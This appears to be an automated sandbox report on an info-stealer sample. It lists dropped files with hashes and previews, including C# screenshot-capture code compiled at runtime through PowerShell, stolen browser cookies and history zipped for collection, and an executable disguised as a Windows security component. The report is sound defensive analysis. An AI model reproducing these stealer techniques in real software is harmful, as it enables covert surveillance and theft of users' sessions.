                                                                                    Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                    • 208.95.112.1

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    No context

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................

                                                                                    C:\Users\user\AppData\Local\Temp\PEHPVXinsv\Display (1).png

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                    Category:dropped
                                                                                    Size (bytes):510877
                                                                                    Entropy (8bit):7.915507832806752
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Z46FGp7sm/BfcQYMqB7XbeF3jUczuXlnOpV7nsZ:O6FyJzYMuAT/zKyS
                                                                                    MD5:407CA0BFEE41829AD31877B5CCB50608
                                                                                    SHA1:FD2381FE00292B6D5ABEAC239C7AE98BE26D7C69
                                                                                    SHA-256:41A07A2E43CDA5F20CDBBB4C3BFD57FF712E2EDB3DDB3B4489703214393750A1
                                                                                    SHA-512:86E1052B4120CC4F8E1B49010AF8440A3B55AAAC13DB7073A2246A354141AAAAD59FB540E798E1B663401D3087FD7DAD570952CC37C778D693FDBA9E4BF5AF3A
                                                                                    Malicious:false
                                                                                    Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.d....#2..u..y.G:mn...==3=w.o....t....(_E........ .G.....2H..[@Q....{..IH.~....b....*$.~........#3..x.o.e.....mx..6w....o{]......o.g....vOv.....o..........'.....x...o..7#.....W.M...7&DqA.......^..}.+.s.....};P....g.:......_i.}..d......N~.KM.......Q.......J~.s=QT..v.d.=.v....3c.}.#.1..wA~....z.Iq.s...D~..%.vEq....HGj..C.np..7j...,o...>.v@g..........KS..`..O.b..Z V...H5Gc.c......X.q.Q.y.(.....}c..|.=!.mm....P_|..j...)v].[b.......+.Y.`....w.lWc...0..x..ZS.|m...],n..j{.0.<.;.....fl....m......o..........w...Nw...-g...."...w.b..C..m.:....h..b...i.v.+L...k..Y..0y.....s.k.O.pUl}....V!..m..mm....6.`U$.ze36e.]ad{...>.vx.[.....2..V...}..+"...C>..&.ax[....e1oh.U..B......c~.~.a....^.[........n.0..Z.g.6o._.5R......m..Y....+f....3..b..?<.>.A,...9.....l...A{..vd...es3m....gX.VKCm.....'.3..M.c.s..|...KB>..mys.)W..^..~.c..b..9.b.....Z.Sm.Z.jv/....{..>.4

                                                                                    C:\Users\user\AppData\Local\Temp\RES41CB.tmp

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4a2, 9 symbols, created Wed Dec 18 22:25:20 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1352
                                                                                    Entropy (8bit):4.015441904564387
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HPZ29c+jwZrwBwZH3wKpwZ6NwI+ycuZhNOqakSpbPNnqSIEgd:vgjwZrwBwZgKpwZ6m1ulOqa3pRqSIP
                                                                                    MD5:255BE4ACB319F0602BB2B92653FD12FE
                                                                                    SHA1:04AA8767F0954C995B0AED7C00E763B9BE9D2B1E
                                                                                    SHA-256:9B18777A74E8666A1AD37B37F0115BD631A5DC9F744A18CB493EA1F834846D41
                                                                                    SHA-512:92B74BD23CAD1B9823A6C24A45C5B8BD0C2273A6DFCAB764DF6BE349876C225B95C8ED96EBE910A361289B09F5BDB37A7DF8FC782BFA33B06BFF2F6E079D7F6C
                                                                                    Malicious:false
                                                                                    Preview:L....Kcg.............debug$S........d...................@..B.rsrc$01........X.......H...........@..@.rsrc$02........P...R...............@..@........S....c:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP................!s..z.+q....:............3.......C:\Users\user\AppData\Local\Temp\RES41CB.tmp.-.<....................a..Microsoft (R) CVTRES.s.=..cwd.C:\Users\user\AppData\Local\Temp\PEHPVXinsv.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.2.s.g.n.v.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t.

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dz4u1oq.yok.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_beec4bou.1rj.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_djaylbzh.0gi.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l15fkpcd.wwr.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvyu5l3w.fnr.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lx4cwf3t.5n2.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb505g4i.t4h.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npuamjgx.rjg.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4523bo1.jzv.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3bq4fem.hhi.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\a12sgnvo\CSC12900879E4FA4A8799F1D0272636A686.TMP

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.0966927975522616
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhSqak7YnqqiSbPN5Dlq5J:+RI+ycuZhNOqakSpbPNnqX
                                                                                    MD5:21730C197A0B2B710B181FA53ADE85F3
                                                                                    SHA1:E730AB4B938F2EF166E9F5F53007DB532C6BEF17
                                                                                    SHA-256:400776FABFEB0DA9856A4661806ACF558EC09BD4159219D44794F9B6D825EB8A
                                                                                    SHA-512:304D1A5AAC01FC140D21BD64A398F81E601B4483B3DE3FA2D3B2D5F089947AB7BA30417C072FD519ED4C206B733B2ACFD799DF309588048BDE0728BC7D1B3A5F
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.1.2.s.g.n.v.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...a.1.2.s.g.n.v.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                    C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.0.cs

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1004
                                                                                    Entropy (8bit):4.154581034278981
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                                                    MD5:C76055A0388B713A1EABE16130684DC3
                                                                                    SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                                                    SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                                                    SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                                                    Malicious:false
                                                                                    Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                                                    C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.cmdline

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (602), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):605
                                                                                    Entropy (8bit):5.323393644049749
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikywZB4WZEmwZB1:V3ka6KOkqeFkywZrEmwZv
                                                                                    MD5:BA10CCAD3FD6F8CA70298C32586A575F
                                                                                    SHA1:AC10A4453F85B5D616F73373DD456ECE4EAA00B7
                                                                                    SHA-256:AAE388F34FB58B48189654AF5B90BEF21655976E278A5A3A6B3B6BA6C53D1D52
                                                                                    SHA-512:593BE00261B7E493692775A6194565E4C65AA87B73AF22898CD803E7B6C8189FC904019968A4DD1417909909738698DC8537B0FB8D8BE32BF80AEB91F98DEE5D
                                                                                    Malicious:true
                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.0.cs"

                                                                                    C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4096
                                                                                    Entropy (8bit):3.1537299251895012
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6G7oEAtf0KhzBU/nf6mtJwN0NXpW1ulOqa3pRq:2Nz0CmYON3RK
                                                                                    MD5:2395C719B4DEF0B8A6593525F35392AB
                                                                                    SHA1:E7FEF003E5459D196DEBF90F289B049AF812B3A5
                                                                                    SHA-256:8C5614EF9B771B153AA3793F6B05F449F0EFD7316DC1A1D2F6AE41BCD0432E39
                                                                                    SHA-512:D23A32C61A4B2419730834DDB941CBEA29802E65A5FA3E534DBDAF7FDD1E2B5223DB1F2CAA9CA7A6506A1DBAC24BBDD1A4457A4D357B9A1D8577F58CE5E2D813
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Kcg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                                                    C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.out

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (705), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):1126
                                                                                    Entropy (8bit):5.413687180581488
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:KTwZWId3ka6KOkqeFkywZrEmwZWKax5DqBVKVrdFAMBJTH:mwZWkka6NkqeFkywZrEmwZWK2DcVKdBt
                                                                                    MD5:8F27AF399FF86F27A4EBB9DAEF59FAA5
                                                                                    SHA1:CCE91532E705263402CACFD1F27ED47ED7073C67
                                                                                    SHA-256:E11B8657B4A56E1ED9811B2D803A69854764DC8C19E8DBA618D704554C0ACAF5
                                                                                    SHA-512:481978ED8267E30FA7BB34E493DA9E2CC01F39FCA8F84B38A60530C4EE8DF2473193307CF659CE30E39299F27BA2053B3EC4275B8277DD7033C009B6423BD965
                                                                                    Malicious:false
                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\PEHPVXinsv> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a12sgnvo\a12sgnvo.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. F

                                                                                    C:\Users\user\AppData\Local\Temp\browsers-temp\user\Chrome\Default\cookies.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):287
                                                                                    Entropy (8bit):5.773243328858008
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Pk3rsSQSvxbVCk3r4zP9JcrDSLukrTSSIGDRmEksDV0n:c7fvv7v74TAHSLLXAGDR+t
                                                                                    MD5:3F798C5E99E84C7286227DEC636D6677
                                                                                    SHA1:5A4E308F6F6AEFA774246264738D5153A756B039
                                                                                    SHA-256:61CDE7840A0C068AAF8DAD3B6DE5CBA28BACAD13F5CE9402F7E01B2B0034089D
                                                                                    SHA-512:0ECAE6AB4D978C355A62DB8B49314464EC925A8B9F651E7C19F677410EA711DCBA284F6A0714415A35121C375EC6D695DC521A8CA4D81BD7681EB99B9671ED4B
                                                                                    Malicious:false
                                                                                    Preview:.google.com.TRUE./.FALSE.13343562100717560.1P_JAR.2023-10-05-09..google.com.TRUE./.FALSE.13356781299717612.NID.511=k9tT3q7Yfh1nx_FSl06F5UE_vdaFQreiGKe1aDN83MeveD7PL1RZXva4s-nFc9waQi9LtKavuTIba8MUkoGu58E8E81gwB_TWJ4Ng-LfCvzhem7rNrhZQ2aGvJZ9g2TYhqx2W2O4E7uHQzPk3vuLvMLxFXZsqE6NdAViQDECGpo.

                                                                                    C:\Users\user\AppData\Local\Temp\browsers-temp\user\Firefox\3nxxd8pi.default-release\history.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:Unicode text, UTF-8 text
                                                                                    Category:dropped
                                                                                    Size (bytes):286
                                                                                    Entropy (8bit):2.3385973091790886
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KqXY5jmGPHA9lfMJJEFArSLvIJiMhKVX3L2WdeXFn:KqXpG/CF0EFAGLciA8deX9
                                                                                    MD5:881ECE97F9BA3CE6769E6E816D2FF6D9
                                                                                    SHA1:2F8C4025E1AF81576204D2C0C6C18F6A058A94D2
                                                                                    SHA-256:D10D488C645DD8076ED7B5079388EA5B4B0543FA1F7A9F484D613ACB72900D8B
                                                                                    SHA-512:98DFC51D4CA1D81EE8E435DED053FD7ABC122C4F55AB1DAFC9D2F23DCC675B04ADC25D374F3FA65344CBB714EF6C247A16D9CF1B483F27BD80C3848E7A8BAFA9
                                                                                    Malicious:false
                                                                                    Preview:Title URL .Firefox Privacy Notice . Mozilla https://www.mozilla.org/en-US/privacy/firefox/ .

                                                                                    C:\Users\user\AppData\Local\Temp\browsers.zip

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):701
                                                                                    Entropy (8bit):6.481675380365101
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:5j3kCxrbNcLDleNvofc9zxJIxfFNg+I1+3v3HgUk/iJYk:93NhOLDletI+s3v35h2k
                                                                                    MD5:F8D249B6A1F3EF3B31E20B86B66A60E5
                                                                                    SHA1:772156651F5F2A47F459F7A1C681DC034C4E4920
                                                                                    SHA-256:1A328E5E8258181BF05A027C04891CB81D1FB3C5F7C5320D3A1ED1CB07E0F175
                                                                                    SHA-512:9AFFF637991258435632F120212156D330F3128FB534D3D8C531013AAF2433E4439A2101E75789B3C4D14725BB229A3F7CB14979A2A808C4D0E30E81B0DB9CD3
                                                                                    Malicious:false
                                                                                    Preview:PK............................user\Chrome\Default\cookies.txt|.Kr.0...u..6.BH...JB.HE.*.&......x.....U.T'..6g....!=0.........8.0.Y9..........,{.y.q.DJ.<...Q....Q>rz.}......4[....n.L..8.t.....X{........<&.......$-.J(....W.0.....W......"#6..BV$.....W.x...fG.[....~UQ..|..X.........PK...?I.........PK........................1...user\Firefox\3nxxd8pi.default-release\history.txt..,.IU......RB..r.,JM.P.(.,KL.T../.LNUx.0E.7.*3''...P.QRRPl.._^^....._........_.1^?.b.>.S.......PK..d.v|b.......PK...............?I...........................user\Chrome\Default\cookies.txtPK..............d.v|b.......1.............:...user\Firefox\3nxxd8pi.default-release\history.txtPK....................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\WdlA0C4PkO.exe
                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3469824
                                                                                    Entropy (8bit):7.999928725904616
                                                                                    Encrypted:true
